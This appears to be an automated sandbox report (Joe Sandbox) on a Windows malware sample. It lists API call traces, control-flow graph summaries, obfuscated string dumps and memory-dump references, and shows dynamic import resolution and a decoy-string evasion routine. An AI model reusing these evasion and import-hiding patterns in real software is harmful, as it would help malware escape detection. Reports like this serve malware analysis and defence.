                                      • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                      • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                      APIs
                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • ExitProcess.KERNEL32 ref: 0040117E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                      • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4026a0-4045b2 call 4045c0 * 216 EntryPoint call 4045c0 * 99
                                      APIs
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                        • Part of subcall function 004045C0: GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                        • Part of subcall function 004045C0: RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                        • Part of subcall function 004045C0: strlen.MSVCRT ref: 004046F0
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                        • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                        • Part of subcall function 004045C0: VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                      • EntryPoint.QMMKZ5D4J7 ref: 00403BF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateEntryPointProcessProtectVirtualstrlen
                                      • String ID: $Qx' '$B<3*D#}qs?% -$^g;]>*:;R^1"W$ $.-\W+$ )!E"-={ $%$!'%R$!;,*"$"* D6 = >506?J`A=P$#/;(/\:%y.=Z$#?63])8<p$%:&*GUT8yR85$&#T/g$&X>?9mb$'U6>>%C$(l$(51?&P"-&(Jz%>]3M5$*$,1'""$*J6% 56ia$+ XA)ul$+\4!:11(%`:U ]+X$$-9#8$.R0lSUF4A$01FMXCEX95B7J7$09S4G4MQKAN$0BW682XETKX7UNL$0CWSCJZWMGPZL$1$1:$1:\%&*,~0+:$1B4YTMOB5QDCHVL0U4BNQOCN9KWVRJCMMIFUX$1D1GPAB5XKKC0X$1G2FBDT3U7OOBH$1KQAC5ZV5$1NSCRIF0P$1PF7$1ZK7SBU1L2H0MOD81$2A3R1RIPIV$2ESECFT5XK6MAG9DE8QCEV7YZ22PZ1B70GBZOFELPDJY8QCOTYUNXSIGG4PJNDF6I8W4EKZ94FXAMJZIZN5BGYKI7$2GN2MD54KJHTUWQICLIC$2PI24AG$2PY4MHEHLFI1YG$2SCUYAJ4$2UGIEIJHFLP4W4HOT5X220WJ$2XN4H36KF95$2YFEYPH61P$34R5939$384DI1N9UX1MX6$3CBOT2KNWE3OOX44$3FCAJTKTS0WOJOVQKMDE9Z1Y2PFY8P6VFMVYL0YNY1NRMBG8E4I97X3DONI3OVUC3BJ627FTY0PHMJL0JGUEH7YRT$3FMXNP3W6E73G$3JC02C2KP2ZB2EI4P$3LYIBQTXXH1C7ZB8266R0$3M42WIMKVOJUP17KT3WWJYW$3P8Z9Y6JU99MNXM74M729M81J2IAKRY2TEFCK8CG6JFDN05A5TF2TS6RQGPHQ69CLH2JSJX5K150G$3RCO4C0HFMM7GLM$42'>705>$45UCF14VD$4:*zd#('$4G1JUZWP5NMMVMPE$4NT7IF1L5IBHYVDS50AKC2G7VRV6KS2WFKW26KI0I0P8$4OVCJYH5HX$4PALPHJU3NNGBBVJRDHLS0AYHK45HR6S$4PCANIMF$4TTZ48L8NP94IKJ9VTS4I46FGU9IE0UYN6J0FK9GMC93ZORDVCVF1NZAWOTK8C4X5LQLAT3LTLSF5CP2C5WBFP79$4WJDPY$4ZMW5SH5LMH8CW$4`j$5$-:C.ylWC0<$5&6!8$533X75YJWEVFH1L55NS3FCCY$5555DJPUW$5759FXSKF9G$5BEPT$5HUHQ$5JUL7QR$5PIKJWO7H1TM$5RP86W594UMCYADVAP8Y4U5O975JAS$5SM1PAXKBX08D$5U8OHLZX7EAN$5WEWP8RRP$5WT9HYZ4UFXC$5YWGV6PQUZUQYJ4KTL4$67LYLN77VQ67SGOZ$6AE2W$6EU3XV2Z$6G4X7LMP6HDUMIC$6JW0IS03$6RCNFNPP8ZT$77ZN$7:,6/ '*^.I$7K0BP9S25VK$7LJ69WW6LSX$7M8D11ZGTVK8RG$7TAHHOARE4BF$7YAM$8"86=$808IOV9BECEN9QKID$81HCQ2RP$878V4CYWVJPM$89H8AR67NW44392K49$8A5F7LT$8AKGBYDGO03Y$8E7VRVIXSUI8NQN8DPLDFMNNMR41JD7$8RIYB53S0CMCIXHQ9$8VCMRYT825P$8W58P$8XD-&? $8Y8TP24UE9INP$8ZUMLZ3Y$8]h$8^h$8_h$8`h$8ah$8dh$99JQTRUI5HBTO6O4WSZ$9JG8VNWUSU$9QHXA6KI$9RF2Q4SAR$9SKH$9TFPGXL7S9882T$9UFAC2JHOW4GS$9UZLO54W69HJ$9V96D7EBZSHB0W$9X8NZSBPD7W$:,:_"=$:407W%($:M:@K$:],8=&!xi/)9$;.[R$;/(5 9o]%^$;5'11gP&/$;6)_8$ai=U>$>$F#6&($?Y> ($@l$@/60&9t$<+9.)$@0)jt$A%>)Ykr$A5Y6GYYY7ZRKA3H4$A6BU8O9IJSP$A8NRS4YWM42GY9HBR7$A9BYF5GQJUOSEF0QDIN$AB5W6N7FNN42PZ$ABAK92M$ADHBJ5POS4IOLVD3Z5KHFQNH$AET9CXEO1Q9BSJVFFZ6Z$AGPYDVSGJHV7KH$AHMT1PKG9P22$AZQB1VU8079UQVCK3XS$B560XXGK$B78CX6XMRZERQ$BFNHYWCQVKMCG182BT5J2PIE8R34R624WCJ8DX26RX6MZCPZP8X5GAPW6IJH3$BIFV$BLXGZ2NVWVP6$BR0RGZEPTGV$BR91$BUARZ8HM1EZ9SXM3$C3MI5ZZ$C72FN9F83ZK1ZI35SFDU6XB$C7DFVGW0NDZ$C7H5ARGYTF94MP1Q$C7UNJS897$CC0WIF23DNO$CJJJWI77KKDQ5RS$CNEFF$CUDESH4BLZ$D%-!<*r6@'6$D.%0=6:Qrx$D1PP8BUAX49O33LVA$D6'9$D8IKWA880W8LL4B0X0$DEEYB9R$DKM7A9UB1GOHO$DL2P1UV5ROXYX$DTQNX5MDYOEMK$DXQUQAI3C122T$E%;_!5?G{/6*$E0FSG5F$E1%^Q54$E7I3742U2$EBGBZHAJ0WH8V$EFOS$ESCQFMP4GBNZLA$EXWQHATI7SN03JQ98N3VO$F6RR$FCS193CXC$FGRCMTCTT8KP6KJH5OCJ$FHJKDB3$FLNMW8IBF4IZYECQNIWX$FO65AOL$FP9AR8IZYOEGZ4E$FRL6$FRQFF645$FUAS7KJ383UR$GJD10ZIJ$GK0U0$GLM2GYHTE6JGWEVFP$GMH5NXNUDHI$GRJ4DAJ7$GT.&$GUUXDSRY8I25LFO42KK$GVEULRBX4DX$GWADV40ZXHA98A25R889P$GZLNXHT4QDWSZEEQ$GZW4NPKF6J0WZDSBX4TZ$H2L2O24HLM6WYSM$H71PY$H8YRSPDSA$H9P29734QSF0IMCNM$HBSFR32KIVRYP73$HGE6LARGY9R$HIVGUPZ65ZDC95UYP9R41P2L$HSAL166G1WPM3LZFKTT$HSJ9QCCJ7AN3666HE$Hh$I12U4PCNR32XX2$I134X6PAXNM$I1W76J8YA2E1Z3B48QED$I2JLRMOKGKEU$IB506NYIQIUCOQJZE2H$IJWQ5UFT$IM8O8FDC$IY80ZA0PLM$J413A8UP$J6YBNLVP34M6OFOS$J7YVWWB$JBMZHBRMU9321Z10CGUH9RA2TC3A007J9QV0YK3XXSVRQ1W3NPY$JIZ5ME8W$JJYK7ZBL$JLVPGUGGHFF3356D$JPYIZSYLY9721$JSB8NMRCHF092KVMQBPF9N$JTOHTSZFOJWF6ON39RRB1VD$JWVWN$K0OZBBFJANSBIKR52$K1NR3MHQTBWE$K22QMOOO1XXLCL9D$K4QTF4VBL$K6UEF$K98GZ4SY4210KT91L4$KAGI07AI91RMLSAABPNRI3KN33LPQK9K122AWFP12GP2MRFM938ZTAIR03P6WU2Z2GVS09N6AVYBNRALX8PWLK10UKK3ZSFINZAG5XW9PCZ7MGDI2DJY$KCSEUXR73KBHEZ58QNNPRHL$KEJ2Z0UDTIE2$KFFAXI4JC$KGE3UOWMJ$KH6PNQ5NLCLSK7HJPH6$KLWIKIALVMPK9OBR$KSAN2BTFFHQ$KY0OOX8SROEEE0Z82998J$L&#3-S'->Q+7$L0S2WA9YHK$L24R3T64HSLOC$L2CBJJYJ2O8$L8KO$LE2F$LGE52YH15O7WRJOE673MYY65VA61$LGOKJ$LHNJZU$LOYTRQ8XNRDU$LSX$LTS08A7UMM0B$LYUWWKS98Q$M26MDRL0D$MAPH850J89FCL098MQ$MXZZH07Q$N0QE3R1FBLTYI20TL$N1M0P2JRF627UK0YE$N2WSCAEMA5I0R3J5A$N68GR9GR7ZLLOFDG61$N7THD4JM0K2UZAT2K8TAVLI5DCQ$N8BABEK9H$NAJPRNV5LLMH$NAMT2P5$NC8GDNJ3ZH5S9FODHQT1PRWUZIA81OYU$NCB6WRDFQYTSM9N7Y6$NFZ2POU$NI2DAK162QI00CZ832LG6SCRNQT$NQE1PCU3CJ7TEB462T253$NZ4BUUV8ZSTPL3BBTLX7AHCKEGH$NZCRN9QYIZ3TVO1Z9P$O8HG30OTG679NDAWPBTD$OBI5R5VBXBBXPPKVJ40LIB49DXYP6CO92N9F6AZZVPT6Z2I49CAD8ZDNGJ14GGEVXC5CPFZJEB03R8KLO3Q3CLADJW9XI5SPK8IX7FP4N1878K6H9QPN0LSMB12$OHF$OI4Y5ZOUJU8AHXAXG14$OIG0ELKUCR1K05KL$OJGVFTD9WMK8SSCB33I6ITV0TI90QNOXH38GHN85IESACP482ZQJYE54YPC6TNSJ7X0YU54Q5NYEBUYDOA706E8D7ER1KCM$OJL2YR67V7D$OQ9S54VDCV8Z9$OS1G4W2BNIZXRNSAN1YUUD44GXTS6GBIXDWTQA$OUN5W8IHBBIGHLXC73LVH5BQYU0VE$P17YIMY$P4WUW4IW320M1EC6$P58PZ$P624KI988II22EXKJ$P[=^PVJ$Q13E18$Q5ANOHWV5EO4W$QEWET2$QH6DFSY16$QIVASFTTK9SKBKRW$QOVS39R7C$QQ3$QTJ8EKU9TS4DOP8YWQP$Q^6+$R0AOSR3MZ7$R0D71SOS$R9N08$RF2EAQWQ25H$RTODVPTBNV5K0$RW33SE1NRE$S431EDOV3ZGC6$SJ7S49CHKXL2KFGYYKHHV1ECRUHBP46N1MKXIB30NABWA78ANPTWQK70F4BJ2B1P17B75TQWRR4VZSBTWGX9LK6QP$SRVR5RI7FPRAM8YRBDM4$STP1M2$SY08EZ62$SY26$T"W/XT)i'''Q&"$T2KD38Y53$T88G:6B@$THHK7DM2G2O4N$TLFA4GLZ1$TSN9T8MIV4C5BF496E9QLBW3RXVN1ERBURLACX8SSMEX8XUA3AOF7AES6TS5N8RRNBLT436JGQ896853DUT1ZLEUN$U1OK0YL$U8FNR10N6A23Z3$U9EY72YMVI7SO2YNWJBNG9VVT1BHIN5XQCDQMF6RONH352$U?(R$UDRXCFVQO1ZPCKI$UEDP3DLL7$UEFP4SCUFWX$UGSQQYYR$UNO9ZSTKIH7B9Q5IHVTL6T9FWU7NNE8L1U57PBMA2NY2JBLX$UP2AM$UTK5TQCZWPRIC7YWA4$V1686L920A9F$V5AD8N75XNTKWEMH45JHTKMMXSTEWVX0I337PE4QCLQ6$VFEAX7KGQ0OGG1H17ZINCEGVE2$VG6EJVJOU73FJTSS5H6UJJCP3TRMR5UGYHPWQT$VJAS1D5EZJJMAT9SXMPVFOF6$VLX56JYP54GJ9$VNFY4CSOO6H6EWQ$VNSD21BTBY38Y8YJ$W4BT3KEBB1N7UQ$W9CYWK0$WAYNDEA1$WIRX383JW6TY$WKCWSTK7O6PCB$WPQEF7CUL15LZ$WQCD6BM$WR482NS5NC0BZGVLFC6VKE$Xl$XA67WEIKKTP61$XM4FPIP$XNJB5RCGA$XQISMT7I8R$XQND2JY8BXG3V6CLTK$XR434T6OCZC0QDIOE$XZ0VL04MYFME4M8PVPPFVN$X]h$X^h$X_h$X`h$Xah$Xdh$Y35ROF9SZYQ$Y5PDUTH4D97YLZV84IHTO$YDH0OX$YLZLPMA9I2$YO091FS5O$YX0PNCF$YYLC44$Z0SPO7PNC5VWSY$Z2JH9HV0I3D15S$Z6'!jy$Z9VDM1G09DW5ZP6G$ZFTAUILC8UCJWG0LQP6BRDY$ZH2MGYKYOGP70O46LCS9H2U48NARYCHAS2QE$ZIYIJGDK$ZJJYNBPIFAHIO53YGMECSQA$ZVBM5Q6WFADS9SD6CG66$ZVSSY$ZXDBNSG8E0QFG845TS2ZE$[$W+>J}XF9%$[8-9x~{njf$^>Y]#$^?>]#=6->5gG=!$b3?#@2$e>"<] #$cG<7#w]:!$hB*&$l&?>otS2XM;p$l?9(+(R4$v#[6.1'`!V=;78$wG]$Uc#7(<($wa~u$x]h$x^h$x_h$x`h$xbh$xdh$~.T;_r1=7$l$l$l$k
                                      • API String ID: 3897645687-1291973295
                                      • Opcode ID: 81a499653747a33a538f3ef0684d5ea40d68f9f2c86e49c6ad2f365952efeb41
                                      • Instruction ID: 6b5cfbd63a0bc7e8d62405858f1a5398eb3fea9943f7fa698a99a0d6434a4d85
                                      • Opcode Fuzzy Hash: 81a499653747a33a538f3ef0684d5ea40d68f9f2c86e49c6ad2f365952efeb41
                                      • Instruction Fuzzy Hash: B6E295B9FD0320BEE2106BE17D03B243AA197A1F09FA4113BFB04792D2F5ED16545A5E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 631 419c10-419c1a 632 419c20-41a031 GetProcAddress * 43 631->632 633 41a036-41a0ca LoadLibraryA * 8 631->633 632->633 634 41a146-41a14d 633->634 635 41a0cc-41a141 GetProcAddress * 5 633->635 636 41a153-41a211 GetProcAddress * 8 634->636 637 41a216-41a21d 634->637 635->634 636->637 638 41a298-41a29f 637->638 639 41a21f-41a293 GetProcAddress * 5 637->639 640 41a2a5-41a332 GetProcAddress * 6 638->640 641 41a337-41a33e 638->641 639->638 640->641 642 41a344-41a41a GetProcAddress * 9 641->642 643 41a41f-41a426 641->643 642->643 644 41a4a2-41a4a9 643->644 645 41a428-41a49d GetProcAddress * 5 643->645 646 41a4ab-41a4d7 GetProcAddress * 2 644->646 647 41a4dc-41a4e3 644->647 645->644 646->647 648 41a515-41a51c 647->648 649 41a4e5-41a510 GetProcAddress * 2 647->649 650 41a612-41a619 648->650 651 41a522-41a60d GetProcAddress * 10 648->651 649->648 652 41a61b-41a678 GetProcAddress * 4 650->652 653 41a67d-41a684 650->653 651->650 652->653 654 41a686-41a699 GetProcAddress 653->654 655 41a69e-41a6a5 653->655 654->655 656 41a6a7-41a703 GetProcAddress * 4 655->656 657 41a708-41a709 655->657 656->657
                                      APIs
                                      • GetProcAddress.KERNEL32(75900000,00686438), ref: 00419C2D
                                      • GetProcAddress.KERNEL32(75900000,00686458), ref: 00419C45
                                      • GetProcAddress.KERNEL32(75900000,00690210), ref: 00419C5E
                                      • GetProcAddress.KERNEL32(75900000,006902A0), ref: 00419C76
                                      • GetProcAddress.KERNEL32(75900000,00690450), ref: 00419C8E
                                      • GetProcAddress.KERNEL32(75900000,006902B8), ref: 00419CA7
                                      • GetProcAddress.KERNEL32(75900000,0068A580), ref: 00419CBF
                                      • GetProcAddress.KERNEL32(75900000,006904E0), ref: 00419CD7
                                      • GetProcAddress.KERNEL32(75900000,00690228), ref: 00419CF0
                                      • GetProcAddress.KERNEL32(75900000,00690318), ref: 00419D08
                                      • GetProcAddress.KERNEL32(75900000,00690360), ref: 00419D20
                                      • GetProcAddress.KERNEL32(75900000,00686478), ref: 00419D39
                                      • GetProcAddress.KERNEL32(75900000,00686498), ref: 00419D51
                                      • GetProcAddress.KERNEL32(75900000,006864D8), ref: 00419D69
                                      • GetProcAddress.KERNEL32(75900000,00686158), ref: 00419D82
                                      • GetProcAddress.KERNEL32(75900000,00690240), ref: 00419D9A
                                      • GetProcAddress.KERNEL32(75900000,00690258), ref: 00419DB2
                                      • GetProcAddress.KERNEL32(75900000,0068A2B0), ref: 00419DCB
                                      • GetProcAddress.KERNEL32(75900000,00685D38), ref: 00419DE3
                                      • GetProcAddress.KERNEL32(75900000,00690270), ref: 00419DFB
                                      • GetProcAddress.KERNEL32(75900000,006904B0), ref: 00419E14
                                      • GetProcAddress.KERNEL32(75900000,00690300), ref: 00419E2C
                                      • GetProcAddress.KERNEL32(75900000,00690480), ref: 00419E44
                                      • GetProcAddress.KERNEL32(75900000,00685DB8), ref: 00419E5D
                                      • GetProcAddress.KERNEL32(75900000,006902D0), ref: 00419E75
                                      • GetProcAddress.KERNEL32(75900000,00690348), ref: 00419E8D
                                      • GetProcAddress.KERNEL32(75900000,00690330), ref: 00419EA6
                                      • GetProcAddress.KERNEL32(75900000,006902E8), ref: 00419EBE
                                      • GetProcAddress.KERNEL32(75900000,00690378), ref: 00419ED6
                                      • GetProcAddress.KERNEL32(75900000,00690390), ref: 00419EEF
                                      • GetProcAddress.KERNEL32(75900000,006903C0), ref: 00419F07
                                      • GetProcAddress.KERNEL32(75900000,006903D8), ref: 00419F1F
                                      • GetProcAddress.KERNEL32(75900000,006903F0), ref: 00419F38
                                      • GetProcAddress.KERNEL32(75900000,006896A0), ref: 00419F50
                                      • GetProcAddress.KERNEL32(75900000,00690408), ref: 00419F68
                                      • GetProcAddress.KERNEL32(75900000,00690420), ref: 00419F81
                                      • GetProcAddress.KERNEL32(75900000,00685DD8), ref: 00419F99
                                      • GetProcAddress.KERNEL32(75900000,00690438), ref: 00419FB1
                                      • GetProcAddress.KERNEL32(75900000,00685EF8), ref: 00419FCA
                                      • GetProcAddress.KERNEL32(75900000,00690468), ref: 00419FE2
                                      • GetProcAddress.KERNEL32(75900000,006904C8), ref: 00419FFA
                                      • GetProcAddress.KERNEL32(75900000,00686058), ref: 0041A013
                                      • GetProcAddress.KERNEL32(75900000,006860D8), ref: 0041A02B
                                      • LoadLibraryA.KERNEL32(00690588,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                      • LoadLibraryA.KERNEL32(006904F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                      • LoadLibraryA.KERNEL32(00690528,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                      • LoadLibraryA.KERNEL32(00690510,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                      • LoadLibraryA.KERNEL32(006905B8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                      • LoadLibraryA.KERNEL32(006905A0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                      • LoadLibraryA.KERNEL32(00690540,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                      • LoadLibraryA.KERNEL32(00690558,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                      • GetProcAddress.KERNEL32(75FD0000,006860F8), ref: 0041A0DA
                                      • GetProcAddress.KERNEL32(75FD0000,00690570), ref: 0041A0F2
                                      • GetProcAddress.KERNEL32(75FD0000,00690000), ref: 0041A10A
                                      • GetProcAddress.KERNEL32(75FD0000,006BF1F8), ref: 0041A123
                                      • GetProcAddress.KERNEL32(75FD0000,00685F18), ref: 0041A13B
                                      • GetProcAddress.KERNEL32(73B40000,0068A378), ref: 0041A160
                                      • GetProcAddress.KERNEL32(73B40000,00685E98), ref: 0041A179
                                      • GetProcAddress.KERNEL32(73B40000,0068A210), ref: 0041A191
                                      • GetProcAddress.KERNEL32(73B40000,006BF120), ref: 0041A1A9
                                      • GetProcAddress.KERNEL32(73B40000,006BF090), ref: 0041A1C2
                                      • GetProcAddress.KERNEL32(73B40000,00685F38), ref: 0041A1DA
                                      • GetProcAddress.KERNEL32(73B40000,00686118), ref: 0041A1F2
                                      • GetProcAddress.KERNEL32(73B40000,006BF108), ref: 0041A20B
                                      • GetProcAddress.KERNEL32(763B0000,00686078), ref: 0041A22C
                                      • GetProcAddress.KERNEL32(763B0000,00685D58), ref: 0041A244
                                      • GetProcAddress.KERNEL32(763B0000,006BF1C8), ref: 0041A25D
                                      • GetProcAddress.KERNEL32(763B0000,006BF1E0), ref: 0041A275
                                      • GetProcAddress.KERNEL32(763B0000,006860B8), ref: 0041A28D
                                      • GetProcAddress.KERNEL32(750F0000,0068A300), ref: 0041A2B3
